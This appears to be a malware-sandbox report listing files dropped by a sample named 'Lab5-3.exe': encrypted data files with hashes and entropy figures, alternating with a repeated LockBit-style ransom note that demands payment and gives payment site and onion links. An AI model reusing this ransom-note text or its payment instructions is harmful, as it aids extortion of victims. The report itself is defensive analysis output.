                                                                                                          Preview:.C..].Qa...Fa....e."+....I..y........V......%.n.h.!^..K.8..9..=...5I...O.#m...96......g.c.".....I...(.)..M.W.S@`t....I..e......gB.*...K.=.`....4..5.&..RI|........3.@..z...&..0q.Y..X.Xu..<o..3.r.dq.Z.b.. u.....b.(.&Q.'@....9.M..4t...2M......`....O.=ay.R..2q)._1..... G.........y...H..{.J...s.v...........~M...D4....3.H$P....K@....C......1.....qdT^..w......8...Ug....0r4J...0......m.1.[.R....xT"D..M.Q~.;.".sq....Km.,. .]z..1.z%...[..y..%.....*..Qw.......q.-7L5.,.\..~.m.U..k.s.....j.....e.......).....c..a.7.....qj....d=c.5P-.^./zqG.1....5E.c...]."/....L!..{..h(.).D_......Z...@..U.3................q....[V^.....>^..........hi.*t. eP...x.!.VS...\.!?...4/.....T[...".U..T..-..Z....S.G.p..._^.O.o..Zr...5 ...M..F.uf..v....(r.*...Gs.<.../X......h.)......I..m.}h.mB.....r.O.0r7.2..v..........Z..T.W...bO@.(......2.{.R......~..T."..1.nG.y:..v=.V.T6M...XRBx.<{.......%.dx.KZ$.E.+..&..d.q]...L..Q.......R..D..O&.O.i.C.u.0.6.~6.X.S@M...D4...`A..Qx..#.z..R...M.@f.W,.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41248
                                                                                                          Entropy (8bit):7.995679590253975
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:6yC5FnmG3g7KKvBJZoblGXaRGNT/fGUhpbuF6a2o4o+T46/KK//OA+i+SK3c1iVo:hCXnmOkXGbcJ/OkuFRA5FOji6O4BQnZ
                                                                                                          MD5:41214FC0538E8304C24838BA5B0E6A3C
                                                                                                          SHA1:C70C81E30B3B127569F5406D662B5DE31E4A17B7
                                                                                                          SHA-256:73819E77E0E37CF0B17D14F90BF8D6CCBDECDF3B1C7852575407D895E0217EB2
                                                                                                          SHA-512:7239AF40419418266008A05A59D10C7D2E423FDF817D45B0C6C1DC9C678206D591CCBD690601422CDAC9DE3C9F32F4AA4E636DC2F9CBA8E198F4571475CD473F
                                                                                                          Malicious:false
                                                                                                          Preview:.~.".qa$......;m.....i.Ws....(>......g6..a.VA....`af...B.|Ef...$.TkU.NKHm.p?.EJy..=.C.s..o.$....n..N<....|{~.n....h"2..)A...{C.b;t........7d'?...F....a0..\..{...Y.]...jM".1~.]~zf.i...8P.g..E4:g.KAU?;Q.%..fa..k...q.p.M<..#w...`5E4...p..\y#.@...wO...)hcJ97..*T...m......"=.BL...s...P...d.d...w...v.S....; ..........M(.S)..Z.....k.....Q..F.(......}....p......9..qa&}$.1......"(...b...x..I}.~.+.kK.......U..4R......*f,...%...j........X.y.. <..+.E7..F.L..9..O#..*.$.s.P+I....Lt..%.uH.5:..X7...4...Q:..!.L[w=.:..k%.3.N{........?..NG.....K..7.AWf>V.8.Q__.-..S.........ea......_d..T&tKdi.T{.e..5....j...@al.........0...=....H....&..)..~..E%,...:z...-...a.f.B.>@..9..{.."E.F...pOw...C{.$.j.i#.......uP.-......n.&..jJ....m..T.KQ...;...r.S0c....E.b<...g.qi|...(.......<....Q...W..`.......1.G/l...a.^..j...4`PMM....M.-9..x.Mx.E..;.>\...vI.Us8e....J0.....X...-..nM.+..r.IR5.=..lhn..g......F..HL...1....X.:}U.C$.....[.Gj......[..J4..f..0`.r..j..<a....k=..3$@"....[8
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43648
                                                                                                          Entropy (8bit):7.995738329387844
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:PbTE9igCeVSZGikcJn8f+OEvl0DfU3MT5Y0LFEEda4OEginLSIiJZ:Pbh9F1kcA+JWDiMTCbEdHLSIiJZ
                                                                                                          MD5:828D0460355B9D62DC7483FFBE68C0B2
                                                                                                          SHA1:E6BFF6A3CC4BD609AE7116945937EBC50D51CC00
                                                                                                          SHA-256:37D97F2E4C312E1C97B4ECE6EE9592EACBAAAA6ACD1FE4140913DC212C3C34C1
                                                                                                          SHA-512:B014DFEF1E37C841291180595151900BF5B082877976DD3A5580D27D5BBA6C4BEB2CE5FD1CAD56F39BB18D573358FFC03E63FDD53663A0AE897B7665FA31DC9A
                                                                                                          Malicious:false
                                                                                                          Preview:.Y....w.2.....F_.C.8...".;UF...B....'.2.%/)w.'......QW.?.....n7.......zfphg]!B..-.y.....\R.."#..P...}.c.._...A..8..*....'|$.....$.+.F..5.LE[bn.r.qCK....H......W.[.e..3nhK..6Q.....?.....1.b.&[..A..0iU.O..&'..b.....L..{.kg..xV..]e.;.....b.`...:.._.w...A.4....u..a...V........B...yBM........~.Ki.).Z.N.6q..k.W......o...x.j1.Q..!...T..=U.A...S.jt...K....)".&......-..\......;..d...#.%.s.{..k...YM...0CtO|...2.`..;............u...S.IJ.ND.&......G...+z.....v.[g.D.....S=F.n.7..6.L. ...Co...=.....`.\xhL..:.......d.GPZ..Xn%.=...U(....B.m.)j'....[......Jq....jX>.@.[.|^LC..C.J...hk..c.b....J.j5nodd.H]..+.U...F.&....Y....W^7....e/.^...!.;.1..w.....{%K...$.3.D.`....K6.N....Ho.....e.H...9.'..\...L!. .P.....W....4..~.S...S...R.qSZ........8..C..1o.6<...^.....r...&-3......o..+._7..........IXj;@2.......w#....`\...M...(..p.&...e..........9....k...Sb@Ua.8..D.t?l..+BaJ...Q=Q..=;.........o....O..Y..5.0.K.v....)t..3.}...=..wm...t..VG..C...P.~k...ZK.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43648
                                                                                                          Entropy (8bit):7.995465007968934
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:QtBwPZUNddm+cFynmvFlnkZldLnZGZviiCF3wo8hUZp/Ucotq6Z:QCngUKldNGZvDCx80p/1wq6Z
                                                                                                          MD5:A71A6C7A65E190BFF7EAB905DF266A3A
                                                                                                          SHA1:8456795874331A24C279F06E59D0126B5532DC3A
                                                                                                          SHA-256:B02DAF37A91AB54E447F58FBD34DC9214C7DC17E341DA3AC786DC570AAD151E5
                                                                                                          SHA-512:5A89DB030505C5418407665B6E97C3403AB8258C817FBDEEABF5A21BC494F7FAD4C6E302DF65305E2A7A657DBDC206748F236F4D64C89857E1410A19AB400F43
                                                                                                          Malicious:false
                                                                                                          Preview:...(...Q......>..t..!......z5?.-..&.......^".f..g..Q.Y.I.....?....R..B....-R_.-.3.._.y...-o....{t.3..AdN.3a..CE.Y........'........U.2.D_e.."......U ....='.j..:..P..WK-`[gs. v.....I%*Q......... .D........r..0.H=..c......Y. d.O..)..j!.&.x...3n...k$W.l.y....oJ.k..]..,..|......x...Qx[...6..K...=..y..X.....)./h.........#O...l.Mh4.j.?.aPd...^.m.....h.QB.o..%^.3P.P|...mu"..L....w...;..f.T..m.T..lZ.........ME..0.v..r..D..`q...I..pJen.us.{..}[..\X...N...[..YK...DJg.O..~hvs.b.].2....|.z...I%..(..J.Bp.....A..?.O...jBV......q...0.U...}.%.V..d.I.R..B.4.&.F.3".-.+X=B.&@7`.[...7.d<.).-.ki.3...M..N....\L.'..8.r..5...X{.....HT..P....i.v>..TB..%qc.j...F.T5.[.>.".n.&.k}.W.m"..."r.t.T..;'....&...5{..z.J......Z.M......]f.@?s..iA/{...w.yM....dn.ik.Uy.ur./....C....Q..o..K4..(......$.M...-./z..H.[...Q..^...*5.X..[..Os....d>.?..N..4...B.....m......g\......o..\V.zZ..+X...o....;..5...2.z^.U6.-..%.t.c.;?R..J.%.].+..i...dI.<8r.]5....x..p."...e.q2..{..D=.c.....L
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):40784
                                                                                                          Entropy (8bit):7.995682323492349
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:HQ5uXHM03/Sw1YKSKSwPG559ARxllKlXfObqqv2c4cVtC5TnlOvNsoZ:H2ooKSdUG556xulXGbn2c4cvC5TlToZ
                                                                                                          MD5:E6382C04131F15BFE4DACEF0C16D9833
                                                                                                          SHA1:F9DFA608E57EE7E6DE4CD82915680BE28D44479A
                                                                                                          SHA-256:E3FA65EEC1E32A473A1E4FCD0303D5FB6C55E7238F7C4AB6DC3415E8B5410611
                                                                                                          SHA-512:71AC4AC47AEA2F36AA53D61459D2331A39B65FFE97A6A53017FAEDA16418E05FBEA19BFA9A48C3D6AF1B9B45FD348CD61890D2F0D164BC728D7A965FA6157844
                                                                                                          Malicious:false
                                                                                                          Preview:~......F5_=....j. .0r...r......H...y2.#X..%..#x<GS8o..>..DF6hl.k..9m.f$......Qb\.9.......Dy.....i|...\c..1..d..\..*@.;N).....5..|.q.......'I.7.........9..X.^N..............\.....$.?..'..\......uw^pX...d.[|.4..~..,.....V.3O...Gs.+.......6v.}...U...!d.x5L..px....cN.9...r.I.,8...SI....ug..........".A.t.s4.G}.L.elI.=B..F.+.J..=.:.....~....%.4..LF7;g...I-.s?..RU..(.*.Tr. ..US......~.....m.~.(...R$..}.{@u..F.....D.. l4 N...Pq.tL.#K........z?,.80{J.9....vd.........Q...v..dtn...3O....q.hPN.8w......{..P..`..z...1....W..Fd"(.#.q%.4..Qb%..i..\.....$...o5...E..1.55RJ.d.Z.%.kCF...E.*..o.'K.....d].,....X*..._.....T.'....o$..hG.7.{.X........OQ.t.....n>.&.;..].B&v.Z....V8.....8...%.E....z.<..o-<5..'..XZ.I..w.7}}0...............&.........;.....K..|.$..k./..5.I.+..~.,..6.R....P..L.....Q..'.......&.H.a....,?2a.'}.....Rh.._.q)...E....wB.9a...f...X.S..v...1.r....m...l..".0.2.#...\2......V..]...i.s..M..n.L.XK....14.~=..2.J....J.5>B..i@.......n.}..*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42800
                                                                                                          Entropy (8bit):7.995601066308144
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:VosImF8zeoO0SYcI58kca6QCqIW0bhaEJAbLuhaeiJyGgcI9ShSZMY4RI2PiPoFZ:V/F8yoxtJ96xJW0cbKhaeiLAMh7Y6IeP
                                                                                                          MD5:101AE6C3EE4E1A27F3ADE47A3517E0BC
                                                                                                          SHA1:C5DEB1E6526C566FB462E99EAFFEE0D09B3CB516
                                                                                                          SHA-256:FAB70BE3475A43E635FACD100FDF3DE3E94A29893F1034BA018193A172149B7B
                                                                                                          SHA-512:D878F9E3BA3E0747BEE2FE93BD649CDE6EC55398E3E095A107EEB99E0FAF4F362EF77F60E3EBB8A374498E994145F56327935C4FEAAA83B06857B3ED12BC895F
                                                                                                          Malicious:false
                                                                                                          Preview:.[...sx....B..7..QX......(z4b.xz*6.......A....).K.S...6s~s.L...z.:..;..B.S...~.I.J..U..jx...I..6.=........K.4...\.*.I..;.Nr.l..5.W.Lf.'.......5.....z.N.$..o.M.97.'.Y.....b.....a .D...}....~.....h.w.....~...;...[.}..$;.(V......e..6.......-...[~^.f7H.E>A..B.....h-I...^.......c.v..b...S..b.A..+.. ..~"o.!m......A.b.A.'...kT.3..S...s......t......).%.a...>.d.U......";6.. C.._.=.Z3...vy.^o..8...Yi.,.a.x..7.3.4r.5..I.f.qN.....y.v....@..fA........V...........SkS.~...3./....oyB..>y.r6.1...824.r..^...oud...t..c..O.(..:.dFBU6..iu.U.....X..U2....&.C....G..G...D.&........xp...z.K.B.....+5..u.2F.yH.B..t..../....$)d........h/._J........>...+.F....I1.H8.*..MB..4<.&..6..~xAq...Z..e...~EA.P@.$Y..Lu.?..;f...p....v......We...2.<.&.U...w..p..T...)...9..z.9i....l..n....>f...5./...x..U.).o....2X.....,...l...*..{]z..pzn..[.-.6.3..#.ap..w.Q.e5...9f..L.f.b.W>F.>.......2...qz.....z......Q....#....x...{~3..y...R.2....O4H...z.2pC.).G3..!.a.Eo5.&..._.v.=}.....P.F.C....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):40320
                                                                                                          Entropy (8bit):7.99532083699032
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:bD+z6CrpsPiYZAZGh6VoIqp2QMQdcoYkUEVH3XucoC8bU+RbZ:f+zJrDjZBCp2QhY2HnucoC8bU+RbZ
                                                                                                          MD5:4D6F0920A72738F333AF91DADF98A40F
                                                                                                          SHA1:8A914FC1BE5D6C273676E5A56F7AB99CE803E3B7
                                                                                                          SHA-256:9A85820F6353C1106EB9F9BDE5C858FDA4A668A3533D40E59E52A72C8FB66680
                                                                                                          SHA-512:B4D6E7049B78D3B609AA9BD1C201C239C1477E184FFF050C5BF7883B475488093F3A80CF866B1C04218DCDD1512D12DA60C4D68117F784B73D911803C53D4F24
                                                                                                          Malicious:false
                                                                                                          Preview:.-............x.......mD..L..|.._/<I......h.H'Z...../.};.-.S\g...mz.^..QL9.S.e........~.D....&.m.QiS...l..`a...8..v....F.PI.yp&.P.!>...................;.<.....x..g....}...mG.L=..).A(.t$....^.f.x...I........R..g....ZlA9...3..JX/(.:).........\E.O."..M.E._}.....U.-...(.bWw~v..L....?.kZ........A..0. .3...S...Mrnp...S.^..M....O.P_....*...?.BH...z}16+$.dv$.8.u.d....(.......I.....RS.X....u!..;N,.R...C.l.D8..8).<.R...l..&..ld5.xn....a.......z. .."..!..r.~!....N....m........]...&28.).@ Y.TY..ap\x.\%......1>..7iYU....B4t..mrQJ..n.....+..E.`......9.>...3.,.r._P;9.[.].5..X...]...u...3..y..)./.!....Q.G<.w^.k.=.T..&..c.Y....lI....G..[1............M^..0g=M.(u...).0...ML.5'.....Q.{...$tt.z.6.b..Je.....l....A.._.J).6.F.C..^iw9EY9Gf...vr...y...1..l....KH.....fy......T=. +.Y..W.+..!P....g....<..T..=.h"jW.....k...b.o.0...W....A....Pe`....J.."......F.fhWZ...o.[.w.S{V...Nu...k).#......O.Z...r./&....5.C.......#....:...N.Q7..AK.._gj.p-ow..LN...$l..Z2..2..q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):46800
                                                                                                          Entropy (8bit):7.995797863892602
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:stJsx8dqwJVnugxXnxeGJ080qq/70FHrtFFIQxxdXTbict3Etos/xZ:s/fcwfnuyXxew0BBYFHjXCcFQoqZ
                                                                                                          MD5:A1D6254D56A7AC926C61D854108C68CB
                                                                                                          SHA1:C9E00C1BBC106C167D371A0EEAE9E798C7F38D53
                                                                                                          SHA-256:A4B39614D4F9EBB4D91666194C5FBBD8179BEFB4AAA5AA12E9BD6D41C0FB800E
                                                                                                          SHA-512:B79C9E9E66664F5CB6B10E0F1854C227D4C47D3470B6F3F98B5500CCD0638090630849D4E3008E955EDA151D4E771CC665432A779374F083DD4E881A76F9D605
                                                                                                          Malicious:false
                                                                                                          Preview:+.].iWnp3......S.`\.EMjkjo.~.........-...T...G..L)...d.JC.t>0.X`.Fz.Q....].R}e.7-5...O..y..[..;..s(.d.ZO.R..6EK..iF.Q.W.@s..o.%7q......v..1..R.../-..Y.l.....G..x.M.....$.6c...o.4..VjI.....*.....jz.P...{Z.y..h.....;..[..>/.Wg..m.N.%u%........J.%..U')5..F..$.E.J...d.....P.......4O...K..b....=...<Re....DS...X.s...4...k...._.....\J.%.W.M..>...h.i3.....o.k.../..D.Z....,..fY...b.....k....0HI.`>^.G. ...X,i..4.T.h.at...l.)S........."............t....6..+...t..&d...;.Z.>....v)..j`K....|.p_K...o..W.a.T..sSRd..>........H{dX..oe..(.3.jSc.tL|0.......J...C.@..Ir.|9.....&..#XX9..}.3b.IvQ7L.I.#,s........o..R..s.(..JJ(.V/u....A.t(.....DgK.....F_Q.[..^..m...O.\........H....Z..3U.m..t.......9y..j[A...%.?......P.j........XJ..J._.........d..{~...8.. .a..@.(.x..N........./...#..u!..<F......r....m..........|1-......4=.}.Y.....B4*.......U[.R..jx...4q.z.....j...3...n+.....q0...L..que.t@<..9.2...\.K..b....&....l.X6..n.y....s.=...W.....^.....Z..*h.*.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
